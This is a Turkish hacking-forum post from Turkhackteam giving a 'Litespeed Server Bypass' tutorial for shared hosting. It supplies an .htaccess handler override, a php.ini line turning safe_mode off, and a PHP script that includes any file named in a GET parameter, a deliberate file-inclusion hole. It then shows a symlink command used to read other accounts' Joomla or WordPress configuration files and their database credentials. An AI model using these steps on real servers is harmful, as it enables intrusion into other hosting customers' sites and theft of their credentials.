THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Litespeed Server Bypass > 404 | Turkhackteam

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
30-10-2013 20:26
#1
Litespeed Server Bypass > 404 | Turkhackteam

Merhaba arkadaşlar , bazi arkadaşlar 404 hatası aliyormuş yavaştan bypass anlatimlarini yapalim dedim..

Litespeed serverlerinden başliyorum...

.htaccess
Kod:
<Files *.php>
ForceType application/x-httpd-php4
</Files>
Kod:
-----------------------------------------------------------------------
php.ini

safe_mode = OFF
-------------------------------------------------------------------------
Kod:
ini.php

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin


Kod:
/home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta

/home/kairos1:/usr/local/cpanel/bin/noshell
/home/kairos2:/usr/local/cpanel/bin/noshell 
/home/kairos3:/usr/local/cpanel/bin/noshell 
/home/kairos4:/usr/local/cpanel/bin/noshell 
/home/kairos5:/usr/local/cpanel/bin/noshell 
/home/kairos6:/usr/local/cpanel/bin/noshell
hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden /home/poseidon/public_html/
bir başka dizin olan /home/kairos1:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi

eğer joomla ise

Kod:
ln -s //home/poseidon/public_html/configration.php pose.shtml
diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler